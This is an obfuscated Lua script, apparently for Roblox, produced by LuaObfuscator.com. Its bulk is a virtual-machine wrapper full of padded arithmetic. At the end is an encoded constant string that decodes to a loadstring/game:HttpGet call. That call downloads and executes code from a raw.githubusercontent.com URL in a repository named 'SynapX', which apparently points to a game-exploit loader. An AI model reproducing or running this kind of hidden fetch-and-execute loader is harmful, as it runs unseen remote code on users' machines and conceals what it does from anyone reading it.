--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v90=0;while true do if (v90==0) then v19=v0(v3(v30,1,1));return "";end end else local v91=v2(v0(v30,16));if v19 then local v110=v5(v91,v19);v19=nil;return v110;else return v91;end end end);local function v20(v31,v32,v33) if v33 then local v92=(v31/((5 -3)^(v32-(2 -(1 + 0)))))%(2^(((v33-((878 -(282 + 595)) -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v92-(v92%(932 -(857 + 74))) ;else local v93=((2207 -(1523 + 114)) -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v93 + v93))>=v93) and 1) or (0 + 0) ;end end local function v21() local v34=0 + 0 ;local v35;while true do if (v34==1) then return v35;end if ((0 -0)==v34) then v35=v1(v16,v18,v18);v18=v18 + (1066 -(68 + 997)) ;v34=1271 -(226 + 1044) ;end end end local function v22() local v36=0 -0 ;local v37;local v38;while true do if (v36==(1 -0)) then return (v38 * (373 -(32 + 85))) + v37 ;end if (v36==((0 -0) + 0)) then v37,v38=v1(v16,v18,v18 + 1 + 1 );v18=v18 + ((706 + 253) -(892 + (258 -193))) ;v36=(953 -(802 + 150)) + 0 ;end end end local function v23() local v39=0 -0 ;local v40;local v41;local v42;local v43;while true do if (v39==(1 -(0 + 0))) then return (v43 * (12211951 + 4565265)) + (v42 * (66533 -(915 + 82))) + (v41 * (724 -468)) + v40 ;end if (v39==(0 + 0)) then v40,v41,v42,v43=v1(v16,v18,v18 + ((6 -3) -0) );v18=v18 + (1191 -(1069 + 118)) ;v39=2 -1 ;end end end local function v24() local v44=v23();local v45=v23();local v46=773 -(201 + 571) ;local v47=(v20(v45,1 -(0 -0) ,20 + 0 ) * ((793 -(368 + 423))^(100 -68))) + v44 ;local v48=v20(v45,39 -(10 + 8) ,119 -88 );local v49=((v20(v45,32)==(860 -((2561 -(760 + 987)) + 45))) and  -1) or (443 -(416 + 26)) ;if (v48==(0 -(1913 -(1789 + 124)))) then if (v47==(0 + 0)) then return v49 * (0 -0) ;else v48=1 + 0 ;v46=885 -(261 + 624) ;end elseif (v48==((3251 -(745 + 21)) -(145 + 293))) then return ((v47==(430 -(44 + 386))) and (v49 * ((1487 -(344 + 654 + 488))/(0 -0)))) or (v49 * NaN) ;end return v8(v49,v48-(4843 -3820) ) * (v46 + (v47/((1 + 1)^(43 + 9)))) ;end local function v25(v50) local v51=0;local v52;local v53;while true do if (v51==1) then v52=v3(v16,v18,(v18 + v50) -(2 -1) );v18=v18 + v50 ;v51=7 -(13 -8) ;end if (v51==(0 + 0)) then v52=nil;if  not v50 then v50=v23();if (v50==(0 + 0)) then return "";end end v51=1056 -(87 + 968) ;end if (v51==((1830 -(1703 + 114)) -10)) then return v6(v53);end if (v51==(2 + 0)) then v53={};for v111=2 -(702 -(376 + 325)) , #v52 do v53[v111]=v2(v1(v3(v52,v111,v111)));end v51=1416 -(447 + (1582 -616)) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return function(v94,v95,v96,v97,v98,v99,v100,v101,v102) local v103=(function() return 0 + 0 ;end)();local v94=(function() return;end)();local v95=(function() return;end)();while true do if (v103==(0 -0)) then local v117=(function() return 1900 -(106 + 1794) ;end)();while true do if (v117==(1 + 0)) then v103=(function() return 1 + 0 ;end)();break;end if (v117~=(1274 -(388 + 886))) then else v94=(function() return 0 -0 ;end)();v95=(function() return nil;end)();v117=(function() return 115 -(4 + 110) ;end)();end end end if ((585 -(57 + 527))~=v103) then else local v118=(function() return 0;end)();while true do if (v118==0) then while true do if (v94~=(1427 -(41 + 1386))) then else v95=(function() return v96();end)();if (v97(v95, #"}", #">")~=(0 -0)) then else local v147=(function() return 0;end)();local v148=(function() return;end)();local v149=(function() return;end)();local v150=(function() return;end)();local v151=(function() return;end)();while true do if (v147==(1 + 0)) then local v182=(function() return 0 + 0 ;end)();while true do if ((561 -(306 + 254))~=v182) then else v147=(function() return 3 -1 ;end)();break;end if (v182==0) then v150=(function() return nil;end)();v151=(function() return nil;end)();v182=(function() return 2 -1 ;end)();end end end if (v147~=(0 + 0)) then else local v183=(function() return 0 -0 ;end)();while true do if ((1467 -(899 + 568))==v183) then v148=(function() return 0 -0 ;end)();v149=(function() return nil;end)();v183=(function() return 1 + 0 ;end)();end if (v183==1) then v147=(function() return 1;end)();break;end end end if (v147==(1 + 1)) then while true do if (v148~= #"\\") then else local v184=(function() return 0 -0 ;end)();local v185=(function() return;end)();while true do if ((603 -(268 + 335))==v184) then v185=(function() return 290 -(60 + 230) ;end)();while true do if (v185~=1) then else v148=(function() return 574 -(426 + 146) ;end)();break;end if (v185~=(0 + 0)) then else v151=(function() return {v98(),v98(),nil,nil};end)();if (v149==(1456 -(282 + 1174))) then local v192=(function() return 0;end)();local v193=(function() return;end)();while true do if (v192~=(811 -(569 + 242))) then else v193=(function() return 0 -0 ;end)();while true do if (v193==(0 -0)) then v151[ #"-19"]=(function() return v98();end)();v151[ #".com"]=(function() return v98();end)();break;end end break;end end elseif (v149== #",") then v151[ #"xnx"]=(function() return v99();end)();elseif (v149==2) then v151[ #"gha"]=(function() return v99() -((1 + 1)^(336 -(53 + 267))) ;end)();elseif (v149== #"nil") then local v200=(function() return 0;end)();local v201=(function() return;end)();while true do if (v200==0) then v201=(function() return 0;end)();while true do if (v201~=(0 + 0)) then else v151[ #"xnx"]=(function() return v99() -((1026 -(706 + 318))^(998 -(18 + 964))) ;end)();v151[ #"http"]=(function() return v98();end)();break;end end break;end end end v185=(function() return 3 -2 ;end)();end end break;end end end if (v148~=(2 + 0)) then else local v186=(function() return 1251 -(721 + 530) ;end)();local v187=(function() return;end)();while true do if ((1271 -(945 + 326))==v186) then v187=(function() return 0 + 0 ;end)();while true do if (v187==(0 -0)) then if (v97(v150, #".", #"!")~= #"/") then else v151[2 + 0 ]=(function() return v100[v151[2]];end)();end if (v97(v150,702 -(271 + 429) ,2 + 0 )== #"\\") then v151[ #"gha"]=(function() return v100[v151[ #"91("]];end)();end v187=(function() return 1501 -(1408 + 92) ;end)();end if (v187~=(1087 -(461 + 625))) then else v148=(function() return  #"-19";end)();break;end end break;end end end if (v148~=0) then else local v188=(function() return 1288 -(993 + 295) ;end)();local v189=(function() return;end)();while true do if (v188==(0 + 0)) then v189=(function() return 0;end)();while true do if ((0 + 0)==v189) then v149=(function() return v97(v95,1173 -(418 + 753) , #"gha");end)();v150=(function() return v97(v95, #"asd1",6);end)();v189=(function() return 1 + 0 ;end)();end if (v189~=1) then else v148=(function() return  #"<";end)();break;end end break;end end end if (v148~= #"gha") then else if (v97(v150, #"gha", #"xnx")~= #"|") then else v151[ #"?id="]=(function() return v100[v151[ #".com"]];end)();end v101[v102]=(function() return v151;end)();break;end end break;end end end break;end end return v94,v95,v96,v97,v98,v99,v100,v101,v102;end end end end end;end)();local v55=(function() return function(v104,v105,v106) local v107=(function() return 0;end)();while true do if (v107~=(0 -0)) then else local v119=(function() return 0;end)();while true do if (v119==(0 + 0)) then v104[v105-#"." ]=(function() return v106();end)();return v104,v105,v106;end end end end end;end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {};end)();local v59=(function() return {v56,v57,nil,v58};end)();local v60=(function() return v23();end)();local v61=(function() return {};end)();for v69= #"|",v60 do local v70=(function() return 0;end)();local v71=(function() return;end)();local v72=(function() return;end)();local v73=(function() return;end)();while true do if (v70~=(1 + 0)) then else v73=(function() return nil;end)();while true do if (v71==1) then if (v72== #"|") then v73=(function() return v21()~=(0 + 0) ;end)();elseif (v72==(4 -2)) then v73=(function() return v24();end)();elseif (v72== #"91(") then v73=(function() return v25();end)();end v61[v69]=(function() return v73;end)();break;end if (v71~=0) then else local v123=(function() return 529 -(406 + 123) ;end)();local v124=(function() return;end)();while true do if (v123==(1769 -(1749 + 20))) then v124=(function() return 0 + 0 ;end)();while true do if (v124==0) then local v152=(function() return 1322 -(1249 + 73) ;end)();while true do if (v152~=(1 + 0)) then else v124=(function() return 1;end)();break;end if (v152==0) then v72=(function() return v21();end)();v73=(function() return nil;end)();v152=(function() return 1;end)();end end end if ((1122 -(118 + 1003))~=v124) then else v71=(function() return 1146 -(466 + 679) ;end)();break;end end break;end end end end break;end if (v70~=(377 -(142 + 235))) then else v71=(function() return 0;end)();v72=(function() return nil;end)();v70=(function() return 2 -1 ;end)();end end end v59[ #"91("]=(function() return v21();end)();for v74= #"]",v23() do FlatIdent_89ECE,Descriptor,v21,v20,v22,v23,v61,v56,v74=(function() return v54(FlatIdent_89ECE,Descriptor,v21,v20,v22,v23,v61,v56,v74);end)();end for v75= #"|",v23() do v57,v75,v28=(function() return v55(v57,v75,v28);end)();end return v59;end local function v29(v63,v64,v65) local v66=v63[4 -3 ];local v67=v63[1 + (1 -0) ];local v68=v63[7 -4 ];return function(...) local v76=v66;local v77=v67;local v78=v68;local v79=v27;local v80=978 -(553 + 424) ;local v81= -(1 -0);local v82={};local v83={...};local v84=v12("#",...) -1 ;local v85={};local v86={};for v108=0 + 0 ,v84 do if (v108>=v78) then v82[v108-v78 ]=v83[v108 + 1 ];else v86[v108]=v83[v108 + (1228 -(322 + 905)) + 0 ];end end local v87=(v84-v78) + 1 + 0 ;local v88;local v89;while true do local v109=0 + (611 -(602 + 9)) ;while true do if (((2 -1)==v109) or (1275==4100)) then if ((v89<=(7 -4)) or (1591>=3580)) then if (v89<=(2 -1)) then if (v89>((1189 -(449 + 740)) + 0)) then v86[v88[9 -(879 -(826 + 46)) ]]=v65[v88[756 -(239 + 514) ]];else v86[v88[1 + 1 ]]={};end elseif ((983<=1808) and (v89>(1331 -(797 + 532)))) then v86[v88[2 + 0 ]]=v88[3];else v86[v88[1 + (948 -(245 + 702)) ]]();end elseif ((4797>=3895) and (v89<=(11 -6))) then if ((3577==3577) and (v89>(1206 -(373 + 829)))) then local v131=731 -(476 + 255) ;local v132;local v133;local v134;local v135;while true do if (v131==(1131 -(369 + 761))) then v81=(v134 + v132) -((3 -2) + 0) ;v135=0 -0 ;v131=3 -1 ;end if ((v131==(238 -(64 + 174))) or (2150<=1197)) then v132=v88[1 + 1 ];v133,v134=v79(v86[v132](v13(v86,v132 + (1 -0) ,v88[339 -(144 + 62 + 130) ])));v131=217 -(42 + 174) ;end if ((3769>=1173) and (v131==(2 + 0))) then for v176=v132,v81 do v135=v135 + 1 + 0 ;v86[v176]=v133[v135];end break;end end else local v136=v88[1 + 1 ];local v137=v86[v88[1507 -(363 + (3039 -(260 + 1638))) ]];v86[v136 + 1 ]=v137;v86[v136]=v137[v88[1584 -(1183 + 397) ]];end elseif ((3794>3693) and (v89<=(18 -12))) then local v141=0 + 0 ;local v142;local v143;local v144;local v145;local v146;while true do if ((1485==1485) and (v141==(5 + 1))) then do return;end break;end if (v141==4) then v81=(v144 + v146) -1 ;v142=1975 -(1913 + 62) ;for v179=v146,v81 do v142=v142 + 1 ;v86[v179]=v143[v142];end v80=v80 + 1 + 0 ;v88=v76[v80];v146=v88[5 -3 ];v141=(2378 -(382 + 58)) -(565 + 1368) ;end if (v141==(7 -5)) then v88=v76[v80];v146=v88[1663 -(1477 + (589 -405)) ];v145=v86[v88[3 -0 ]];v86[v146 + 1 + 0 ]=v145;v86[v146]=v145[v88[4]];v80=v80 + (857 -(564 + 243 + 49)) ;v141=4 -1 ;end if ((v141==(0 -0)) or (3315<=2782)) then v142=nil;v143,v144=nil;v145=nil;v146=nil;v86[v88[2]]={};v80=v80 + (2 -1) ;v141=(906 -601) -(244 + 60) ;end if ((4 + 1)==v141) then v86[v146]=v86[v146](v13(v86,v146 + (477 -(41 + 435)) ,v81));v80=v80 + (1002 -(938 + 63)) ;v88=v76[v80];v86[v88[(1207 -(902 + 303)) + 0 ]]();v80=v80 + (1126 -((2054 -1118) + 189)) ;v88=v76[v80];v141=6;end if (((6 -3)==v141) or (876>=2964)) then v88=v76[v80];v86[v88[2]]=v88[3];v80=v80 + 1 + 0 + 0 ;v88=v76[v80];v146=v88[1615 -(1565 + (1738 -(1121 + 569))) ];v143,v144=v79(v86[v146](v13(v86,v146 + 1 + 0 ,v88[1141 -(782 + 356) ])));v141=271 -(176 + 91) ;end if (v141==(2 -1)) then v88=v76[v80];v86[v88[2]]=v65[v88[4 -1 ]];v80=v80 + (1093 -(975 + 117)) ;v88=v76[v80];v86[v88[1877 -(157 + 1718) ]]=v65[v88[(217 -(22 + 192)) + 0 ]];v80=v80 + (3 -2) ;v141=6 -4 ;end end elseif (v89==(1025 -((1380 -(483 + 200)) + 321))) then local v153=v88[5 -3 ];v86[v153]=v86[v153](v13(v86,v153 + (1 -0) ,v81));else do return;end end v80=v80 + (2 -1) ;break;end if (v109==(0 + 0)) then v88=v76[v80];v89=v88[1];v109=1;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403463Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F536E6970657A2D4465762F53796E6170582F726566732F68656164732F6D61696E2F464800094Q00067Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
